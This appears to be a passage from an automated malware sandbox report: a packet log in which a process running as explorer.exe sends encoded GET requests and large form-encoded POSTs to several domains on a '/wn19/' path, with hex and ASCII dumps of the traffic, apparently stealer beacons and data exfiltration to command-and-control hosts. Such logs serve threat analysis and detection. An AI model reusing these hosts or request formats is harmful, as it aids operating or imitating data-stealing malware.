OAZ068Vk2jg58olp6sfOyCeZp_4Y(5chiVKZVhaDkDtyO0xKGymXGFY92KNTiX3blaODF3pMVHsWApjipI4ycTzBH9CVexF0JG6OrcufrXsnKYTJ431QvdxxAxvBtqbfOa3cblYdBhspPuhiS0lP5RvBMoF4a1PtbWSWIMcHRGqg79BB(F86W54odyYXoS6v49pmo22O4aW_lWbahXF4BVrVnRHLygMwu2hTvTBeOSn3CtNtvdZnxUc1xtWy8hw60qkTa2eoCnVZA_oeBTxtksVHCYQ_i8VKZzEqmglVQ8xw3SpQflwNadaPol~s4j7vsg2FXrSTJ9p9sw02~Kryd1SaAZc-(7Q3Kyo6ZBM8Wt(
                                                                                                  May 10, 2022 14:26:48.269566059 CEST10076INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 10 May 2022 12:26:47 GMT
                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                  Content-Length: 281
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 65 74 73 75 7a 61 6d 74 69 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.getsuzamtir.xyz Port 80</address></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.11.204977368.65.122.21180C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:27:06.293628931 CEST10077OUTGET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1
                                                                                                  Host: www.schnellekreditfinanz.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  May 10, 2022 14:27:06.458909035 CEST10078INHTTP/1.1 301 Moved Permanently
                                                                                                  keep-alive: timeout=5, max=100
                                                                                                  content-type: text/html
                                                                                                  content-length: 707
                                                                                                  date: Tue, 10 May 2022 12:27:06 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.schnellekreditfinanz.com/wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp
                                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                                  connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  7192.168.11.204977468.65.122.21180C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:27:08.635654926 CEST10085OUTPOST /wn19/ HTTP/1.1
                                                                                                  Host: www.schnellekreditfinanz.com
                                                                                                  Connection: close
                                                                                                  Content-Length: 227520
                                                                                                  Cache-Control: no-cache
                                                                                                  Origin: http://www.schnellekreditfinanz.com
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept: */*
                                                                                                  Referer: http://www.schnellekreditfinanz.com/wn19/
                                                                                                  Accept-Language: en-US
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Data Raw: 41 56 6e 58 41 68 3d 64 74 49 75 6d 67 64 39 35 30 28 34 49 42 59 71 38 31 4e 6c 65 6c 47 58 36 51 64 77 69 45 54 59 6a 31 4d 41 66 36 48 61 6a 71 30 6e 70 4d 35 37 54 4b 72 4b 52 75 44 56 6f 79 55 72 52 46 58 37 58 58 35 43 6f 4e 7a 44 6c 53 70 47 50 6b 53 63 51 30 63 37 31 36 47 72 4c 55 44 35 4c 33 48 47 65 78 50 44 53 43 4d 66 67 43 6d 31 34 72 69 78 66 38 65 37 61 4d 31 32 35 32 28 72 36 50 33 62 66 71 38 67 57 2d 77 4c 73 63 72 4e 4b 48 6f 59 76 4d 55 4a 7a 35 51 34 6c 48 6b 68 74 31 34 67 65 36 59 54 64 6d 34 67 6c 74 79 49 65 4a 28 75 63 5a 71 44 6e 63 62 76 36 6c 41 6e 71 4d 45 76 6a 67 28 62 72 57 39 68 4b 41 39 70 68 7a 6a 76 6b 48 4b 59 77 75 35 34 7a 59 48 6e 66 66 4b 79 54 58 33 39 7e 4d 51 2d 55 74 73 49 6a 64 43 62 39 4f 33 67 50 38 33 4e 35 53 65 44 53 77 72 68 71 30 57 57 79 4a 46 34 74 50 33 6e 74 6a 7e 50 7e 4f 4c 6f 6c 41 36 79 46 79 4d 55 61 70 56 78 6a 6a 6b 68 50 69 65 71 65 7a 50 37 63 65 6c 79 5a 55 7a 6a 71 2d 51 51 70 45 57 72 62 5f 70 6a 4a 56 62 70 36 2d 67 4c 55 5a 49 7a 54 47 4a 66 52 65 31 54 64 43 73 57 4b 77 79 42 54 4b 50 39 74 6c 4a 70 30 64 74 58 7a 6a 78 68 57 79 77 6f 57 34 28 38 30 35 37 4a 49 56 70 6c 46 47 4d 52 4f 64 66 79 62 54 42 39 6d 32 72 38 48 43 32 69 68 6c 54 38 41 55 42 31 4a 36 52 6f 4a 39 77 58 39 53 50 38 50 69 4a 73 75 53 6a 57 6d 5a 67 46 76 48 79 4d 65 45 73 43 63 59 77 56 67 56 53 6e 6e 72 37 32 6b 33 71 72 41 59 5a 70 76 78 6d 79 53 67 6a 54 63 61 59 46 41 6b 69 46 41 69 62 38 72 62 6b 51 45 7a 79 36 64 70 78 79 41 4c 36 61 6a 65 46 75 5a 35 55 36 52 45 37 59 64 61 61 73 58 44 6b 32 46 63 7a 35 53 4e 67 6b 54 69 53 47 46 4e 45 6c 41 79 41 4f 53 45 48 64 45 50 37 7a 44 46 33 7a 71 53 55 57 4f 6c 4d 4b 38 51 57 66 53 36 51 54 64 72 44 69 78 71 73 38 52 47 52 4e 33 6a 68 52 4b 4c 41 5a 6a 2d 41 4c 36 52 53 53 6b 56 68 48 36 44 53 6e 58 66 59 61 4e 56 53 73 65 76 66 58 32 35 6a 72 47 72 37 67 74 49 57 41 45 53 55 6c 6a 79 30 6e 71 76 72 35 45 62 59 44 38 54 49 75 52 65 6e 53 44 6b 56 35 36 35 33 61 44 6d 39 61 53 31 4c 47 7a 76 4a 7a 33 66 35 4f 6a 6b 78 78 4b 35 31 59 28 35 48 6d 58 43 68 63 4e 57 39 78 53 51 4f 79 42 48 48 4b 45 4e 6b 63 6a 41 75 49 67 52 44 54 55 59 67 4a 6e 39 43 44 30 37 4e 4c 78 32 75 45 35 44 50 4d 53 66 75 6c 74 56 78 57 64 51 78 54 31 53 39 57 6c 77 7a 4e 42 63 34 79 62 4b 30 7a 59 4d 28 4f 4b 53 74 50 49 58 50 77 5a 4a 43 53 5a 36 32 4f 67 6f 59 52 37 2d 56 4b 67 41 43 50 75 43 4c 47 69 38 79 71 79 55 4b 4b 30 63 73 42 76 45 39 5a 34 63 48 5a 6a 4d 43 72 63 75 69 47 6e 62 7e 6f 75 74 75 6b 55 4e 30 31 65 4f 4c 6f 36 72 76 42 73 4d 34 51 54 78 42 49 53 52 7e 4c 6d 46 4c 46 77 78 78 54 45 47 34 71 62 42 61 72 52 45 4a 69 76 6f 7a 52 34 78 58 45 47 7a 43 45 56 50 74 45 41 49 63 46 74 62 33 48 56 7a 33 54 6c 48 65 62 6e 42 46 6c 6c 4c 71 39 50 45 44 63 33 5f 75 68 33 6d 64 4d 62 45 45 61 54 4c 48 47 4d 72 73 63 55 52 48 57 30 6f 48 35 42 62 33 44 62 74 48 30 72 73 50 49 4d 57 47 61 41 47 68 4c 31 36 46 6a 37 59 72 58 4f 6c 71 49 58 59 67 44 4f 69 4b 48 70 56 51 55 64 35 76 75 7e 53 66 6c 36 4b 63 4a 6a 50 5a 47 46 78 6a 63 67 44 49 4d 4f 57 47 66 30 32 76 54 45 6b 57 63 68 65 55 36 35 56 6b 42 49 49 4f 51 53 5f 4a 72 48 6b 74 73 6a 4e 42 58 4d 35 35 57 6f 4b 53 4a 32 4f 6b 79 37 51 35 74 37 66 4f 49 36 68 4e 72 4b 72 4e 49 4b 53 38 34 45 41 7a 65 72 47 37 52 6f 6b 68 6e 52 58 71 4f 67 72 65 69 77 4e 77 48 4e 33 6c 36 72 59 69 57 6b 73 53 54 63 30 64 5f 6d 69 4d 43 77 50 44 53 6f 56 53 6b 55 4f 6c 4a 28 6d 6d 30 77 76 74 58 56 65 32 7a 77 70 56 6c 7e 6f 6d 50 47 43 69 45 58 42 34 4e 37 59 33 4e 32 34 4c 52 4a 54 32 71 6d 7a 43 37 37 4c 7e 5f 51 67 36 63 32 47 7e 41 6e 62 59 33 65 4d 41 4f 71 6d 4b 30 69 36 78 63 4c 69 54 38 49 6a 33 46 53 36 63 56 6e 76 6b 75 38 5a 78 4a 69 4f 28 39 73 45 75 4b 76 57 76 69 70 46 4d 51 31 35 32 62 33 51 79 43 43 4b 71 32 49 75 37 75 33 37 39 6f 50 4e 37 6c 66 47 68 4f 6e 76 6d 30 45 4e 4e 6c 44 4b 48 6b 48 43 6c 50 58 53 6a 2d 6e 59 6f 46 45 6a 6b 59 57 58 43 6e 44 67 77 56 42 56 53 6b 6f 43 65 53 31 76 52 4c 35 30 65 47 37 38 5a 6d 53 2d 43 56 68 52 59 41 42 64 39 4f 55 65 4a 62 73 6b 45 67 49 73 5a 30
                                                                                                  Data Ascii: AVnXAh=dtIumgd950(4IBYq81NlelGX6QdwiETYj1MAf6Hajq0npM57TKrKRuDVoyUrRFX7XX5CoNzDlSpGPkScQ0c716GrLUD5L3HGexPDSCMfgCm14rixf8e7aM1252(r6P3bfq8gW-wLscrNKHoYvMUJz5Q4lHkht14ge6YTdm4gltyIeJ(ucZqDncbv6lAnqMEvjg(brW9hKA9phzjvkHKYwu54zYHnffKyTX39~MQ-UtsIjdCb9O3gP83N5SeDSwrhq0WWyJF4tP3ntj~P~OLolA6yFyMUapVxjjkhPieqezP7celyZUzjq-QQpEWrb_pjJVbp6-gLUZIzTGJfRe1TdCsWKwyBTKP9tlJp0dtXzjxhWywoW4(8057JIVplFGMROdfybTB9m2r8HC2ihlT8AUB1J6RoJ9wX9SP8PiJsuSjWmZgFvHyMeEsCcYwVgVSnnr72k3qrAYZpvxmySgjTcaYFAkiFAib8rbkQEzy6dpxyAL6ajeFuZ5U6RE7YdaasXDk2Fcz5SNgkTiSGFNElAyAOSEHdEP7zDF3zqSUWOlMK8QWfS6QTdrDixqs8RGRN3jhRKLAZj-AL6RSSkVhH6DSnXfYaNVSsevfX25jrGr7gtIWAESUljy0nqvr5EbYD8TIuRenSDkV5653aDm9aS1LGzvJz3f5OjkxxK51Y(5HmXChcNW9xSQOyBHHKENkcjAuIgRDTUYgJn9CD07NLx2uE5DPMSfultVxWdQxT1S9WlwzNBc4ybK0zYM(OKStPIXPwZJCSZ62OgoYR7-VKgACPuCLGi8yqyUKK0csBvE9Z4cHZjMCrcuiGnb~outukUN01eOLo6rvBsM4QTxBISR~LmFLFwxxTEG4qbBarREJivozR4xXEGzCEVPtEAIcFtb3HVz3TlHebnBFllLq9PEDc3_uh3mdMbEEaTLHGMrscURHW0oH5Bb3DbtH0rsPIMWGaAGhL16Fj7YrXOlqIXYgDOiKHpVQUd5vu~Sfl6KcJjPZGFxjcgDIMOWGf02vTEkWcheU65VkBIIOQS_JrHktsjNBXM55WoKSJ2Oky7Q5t7fOI6hNrKrNIKS84EAzerG7RokhnRXqOgreiwNwHN3l6rYiWksSTc0d_miMCwPDSoVSkUOlJ(mm0wvtXVe2zwpVl~omPGCiEXB4N7Y3N24LRJT2qmzC77L~_Qg6c2G~AnbY3eMAOqmK0i6xcLiT8Ij3FS6cVnvku8ZxJiO(9sEuKvWvipFMQ152b3QyCCKq2Iu7u379oPN7lfGhOnvm0ENNlDKHkHClPXSj-nYoFEjkYWXCnDgwVBVSkoCeS1vRL50eG78ZmS-CVhRYABd9OUeJbskEgIsZ0Wg8Ar1lRnw7FXWfyLdqcjP7HNDRUIW~1YnXlwgOweKOBK0HzH6uXfdpYKnfFSJMzQdHwePsqUTHYPQzng2u7Ais6fgifebcx5hlLKUvO7Xj0aBnp(pSYmoyTW8mc7767bRotxjFZ7Mhw0rV671CFYVCe5bY27yZI9YwTNGe9SqxLAPz9aZnTiJJ-RZ~mpQtDGbrb(XQVnOvRA-0eT7XHVQlDELrueZJRgPV9o2xN5DDJX4WxeY0Q2_IGBoVGswPqgoo0byEoXcQZDC0O(1NEJXIqr5qBtsJmwFGwWtv2GN8vICaewn5AkahsqyFzPJp85kIFW8wPbXxEtovD~UTn~YBVw-WhKde9ZQOS8B28uMU7A_oKY5VhGV1smeBouCuRr4~NFG6nCWaX1NbU2DX3Lm9phF4FiFr1f1unZifj2rZ4Cu~kSd0CAT5LEhg5rMOjrd~3IORS5PbgBN4qZk9Z4HBC3q(RFSo_lGhOcMB9zSEq(IwTSl1Yst87TCC6rb3Y8LFeLPc7soIof_ajZhH9cQxMv29x9Ke7T90K1BrEdTqgK3snM-eobewWeQSIC4gmtzdFquVl8xOtrib5ME6WS5B8pKIag41euEB4pts7wL(KtNGKJfsiJUIM8PCVJ0Jfief1vKv2ucvGoga-PTb9BnFvyC5hDiY3JM5lTuJ4q3qLg4LKGAR0Ude0xuOE9e4IlfRPRvUkBX5FIvIIiPWOi04w4OSaz-O-a-Os5bkv5KT3hYtd~A9gPBDQRfspuB6n(rVzL2BX5nzBrojT4bmgCiqaLdG92MUixbyG0-CCRIqCDOd6UjA5tK6RsXuXv76FpkMJ~L5QTnx_oxNVLl5vEhtF0IWxoKysA5zgZl2dxpm5UL~JVewMM2OM~WrOp-5E8qlftLPa(TatgwtrzK055rJmByPH1dsRdimpgaSYFYp9EP3JiMrzHOppg4qH1N8xsA2jk6nsWpfbjDRRWAAAaHq-z83Wps(6Ki3S5shhMvuAF644M7EpS8XZ~58CnDs9SGLg8dmgvwArK9s3UYzrNkQQkHwtXUqhlK(mnSa0eVa5s5kX3-SYhezFEYylzfsz9eHDozve9dUBJnT1OsZsWzaNVR4ts9~3v3EpCAF5nStEd1Km8gCwrXkx0syioFA6TRZAlzJie6cV7BZUEBFqMZui(Io2hI0_8dCI(j24nepfQYNiVfGYV6KE1UOnarFOS0bUtLrzgS5fkD0gh34SvFKARGhW(EsL7TdGnb9V7xa1X07GcNkLUZ6QGSOX1mGqaKZOGEHBV8jSUt2UcCGbrTO14gGXJnKJDfF_VCI-SXNBoc6Zrw3KP90yY-ooj-WSXGWpR88x15tvB-EprHQHIULBtyN3oySxe4s4MCtiCeoedQUifgZA(yrAzFLFw-A_al2qhwSpQoRLB2pHiKQAfqyCTZvVtGncPeYdLsfvWm9-OdOjhvwxuMVbRJcKExikNzY1h-V45q~lYSDCUbdSeGy_OrBU18T8NqFUiHxPl1o-nQAxqCww(2bZ0rIdlavxacsTpZqVPadUCKV5jdfOh6oTwcUk3XvPqvOEO9g6Kj1To_Dg~Ko5AouvDJE3IKloCB5J2twGMXBp~J1uizQtrOZbUcQErDnD3PsaQ063DYoV9bQHi-FRFb(FTZS0yBPwtXMg0bR_WAeXUaFOCuu1jSCowu6Eqd5F~LXWmwK1OryVnHXbOapN48HelxXMfO2A00(wwFTkxOUQ1GSNjwf0fTWWKOC0U1D_SmS3OOL-4n3bdr6SKjQetVMV674uO0Y89AXDLYx073lIL9qAGpTVrq~zeCMR3DCichNR2lkC5wpBxwBh3-4Cki1pmk~LaikROVXy1-Eknqty~XQrYaUa7-fkUEuxNhFv3UiJjCQWUgfJ4v8RP8iUpoGJZAr_Z924onX5DJYgzq5MILSKYFssvfjlpVXJHwyRmiGiF6iguGG_mO5HZ9Urc-WDmG8IVG5hidSMqC1F4wV06QMyCaJyNeKKn2sOLoE_UwhdJAlI8TbVZl7q90ObGW7uDk8Edxi0sRveXZ7f9LHaOsWU9s(5kT21GrjLhRtVjD4cpZqR4YuIt432GmsKt2dKEDeB0ZBKttT7kqiUnYT80yX8qbeOLlJW07lFPVFmEHPZPMyZ6sH_TzPkk-S40gBrv4cZnxvVzCyweKAvYvIcMCrtOSJCKF9fCYyGCdlDUznZ1XHriCs_YiHAmxFbcWbq4tXvNx5Azah5rxSYCmd8Uy9x0AazHw4k9TmMs-ySB1BHjGPmiA(y8JfF8ixTNhp5RNYMJ3qYzFIrOlUHFMmv4u~0kAhPZiwP3dyoM0od6-Aarzj53wHf2vz_Oxo8dtQ086ZjArluXio_rypW3jhlR6vrF9~jQdEpmP4c0Ct47vcqJJAJlD1wUteYchBr8xfOHUOBn4Gvbr6G8QpkD8Atf9wjPblHSvASE3SQYiy7tydKOvWradVNYHEP3y2vylTDkOZcP8ZyK8sl(MGR38lnIOdV(tT0E3rOpYtvAojBwXqwhbPjYraBK77jXJKMeG2_xxx9jVejF6~O~Np4rW~SH8JLLYimiRcVci8vuy8vvnkmCINcG2mSzTOlMCTUGoed6YXs5Yy6fhLpM8mCkqSK1qEVPmajHVqUibbdlP1uQxe7UzpQwoKRuRmM2Rq0QeC99C3BhZ6Vrez4aSHE~tpROhsJmBKNgG~fjN6DRTKwUh2


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  8192.168.11.2049781185.53.179.17180C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:27:25.137101889 CEST10252OUTGET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1
                                                                                                  Host: www.repaircilinic.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  May 10, 2022 14:27:25.144925117 CEST10253INHTTP/1.1 403 Forbidden
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 10 May 2022 12:27:25 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 146
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  9192.168.11.2049782185.53.179.17180C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:27:27.170840979 CEST10256OUTPOST /wn19/ HTTP/1.1
                                                                                                  Host: www.repaircilinic.com
                                                                                                  Connection: close
                                                                                                  Content-Length: 227520
                                                                                                  Cache-Control: no-cache
                                                                                                  Origin: http://www.repaircilinic.com
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept: */*
                                                                                                  Referer: http://www.repaircilinic.com/wn19/
                                                                                                  Accept-Language: en-US
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Data Raw: 41 56 6e 58 41 68 3d 6a 6a 69 64 4a 34 4a 39 4b 5a 58 54 31 73 57 75 79 35 54 77 79 53 61 57 75 31 4c 39 71 4c 44 6a 48 62 77 6b 62 59 4b 36 52 61 4f 76 64 50 6e 6d 55 45 63 72 30 5f 79 42 7e 4e 7e 5a 4d 70 51 70 32 42 78 4c 45 66 55 32 4c 54 4d 53 54 31 51 74 30 51 57 42 46 42 37 67 7e 4b 38 31 46 5a 6c 56 68 2d 6b 74 70 73 54 6d 49 54 4b 38 62 48 6a 54 5a 52 43 74 47 77 69 7a 35 46 7a 6b 35 72 42 65 46 2d 66 55 62 66 69 37 4e 69 5a 45 41 66 6c 56 49 65 32 39 77 72 4b 77 49 4b 39 49 57 6d 51 6b 7e 51 74 6d 66 65 38 41 67 70 65 76 33 49 48 62 41 41 63 46 45 70 75 71 35 5a 7e 4c 56 4e 68 54 32 61 6b 74 68 4e 5a 63 66 52 38 77 7e 48 45 44 62 4b 53 53 55 34 78 6e 4c 52 7e 44 32 55 6c 38 71 63 59 64 39 65 65 66 69 31 50 65 53 71 56 2d 49 32 67 30 4d 55 41 66 30 76 6b 64 48 62 50 62 62 64 39 45 67 4a 44 76 59 54 48 34 67 4d 71 52 4a 33 30 50 4c 4c 4d 61 31 31 71 76 4b 78 46 37 74 30 76 73 47 33 37 30 70 61 4f 48 57 71 49 71 32 53 53 79 69 72 55 38 73 38 6c 2d 4d 63 78 4c 41 79 78 75 7a 39 6e 54 41 79 48 72 30 54 68 6d 4c 76 35 44 4f 4d 54 56 61 39 37 5f 64 6f 5a 71 7a 4f 48 7a 53 32 56 36 62 53 28 48 69 46 31 6b 44 62 65 6c 43 5a 45 6d 72 6b 76 31 71 77 38 6f 78 68 75 38 54 4f 4d 42 73 49 38 66 68 35 39 47 4f 78 6a 56 72 45 4e 4f 38 57 56 56 7e 71 68 2d 54 66 38 39 69 32 76 5f 4c 79 62 36 41 76 45 75 4a 46 69 7a 56 67 32 33 67 76 34 30 33 34 59 34 6d 67 65 59 73 6c 62 45 6e 75 73 61 39 36 52 45 64 56 44 48 50 7a 76 4e 50 4d 52 79 74 68 76 48 36 4e 32 51 54 79 46 58 7a 65 48 52 6d 6f 33 34 33 31 39 2d 35 37 61 71 51 54 62 4d 50 7a 31 2d 6a 36 7e 68 55 41 4e 6d 6a 6a 78 33 77 4d 4f 32 58 4e 28 63 79 38 65 37 4d 36 4b 76 28 52 77 63 4b 66 56 68 47 67 48 41 71 77 6a 35 45 7a 4b 41 6f 65 38 54 74 71 7e 69 68 52 59 76 71 64 68 32 37 78 75 62 79 30 33 36 41 48 5a 7a 78 68 59 4c 6f 47 39 34 49 71 68 36 77 53 6e 51 41 31 49 62 44 69 78 31 63 31 44 59 48 65 33 35 5a 41 33 51 64 75 65 37 45 72 6a 62 74 31 52 78 75 34 4d 64 6b 76 65 4e 7e 50 66 64 79 47 44 53 69 49 71 36 6a 56 7e 56 58 47 43 74 57 55 28 31 64 4e 66 76 35 4a 6b 33 44 76 66 30 4e 61 5a 4a 39 49 57 71 4f 31 78 65 71 5a 33 69 6e 42 6e 72 50 42 57 66 50 64 64 75 32 35 4e 50 4e 70 48 4a 77 42 63 2d 56 47 49 6f 36 30 6b 66 35 44 68 58 6c 37 30 48 4b 75 46 6e 77 6c 5a 75 32 42 79 65 66 4a 67 47 7a 5f 65 79 79 58 4a 79 56 54 71 6f 73 37 4b 37 66 74 4f 6b 34 7a 66 4b 41 6e 57 6c 55 79 36 5a 62 47 79 64 6f 49 39 63 6d 51 50 44 63 37 35 64 4e 57 6d 4d 4c 36 56 39 31 74 6b 73 6f 55 5a 30 76 6f 66 4e 77 68 7e 69 46 44 36 6c 4f 39 55 37 73 7a 6b 59 41 33 6a 4d 54 69 4a 61 75 71 59 31 49 2d 74 37 33 76 72 36 68 6d 36 57 70 64 30 51 74 6e 43 61 64 64 65 50 55 79 4d 52 56 52 6f 41 58 36 6b 51 45 64 44 31 64 70 67 5f 4a 4d 6a 4c 34 36 33 62 6e 54 38 70 74 6b 72 53 36 5f 59 50 59 47 57 59 4e 5f 32 64 69 55 33 46 28 50 78 46 61 30 47 75 43 74 61 6c 43 4f 45 66 53 6f 6c 76 51 62 72 54 4e 57 77 56 5a 57 71 2d 48 4c 47 65 6a 53 4e 4e 74 52 7a 67 30 4a 4a 4e 77 6a 43 6c 62 61 79 79 6c 49 73 74 48 2d 36 56 4d 6d 6a 5f 71 38 63 72 6e 58 36 69 6a 75 4a 50 55 34 72 6c 4d 6c 58 67 39 7a 74 35 68 52 54 6f 41 32 64 62 4f 4b 33 7a 53 63 6c 4c 6a 6f 48 30 4f 67 78 74 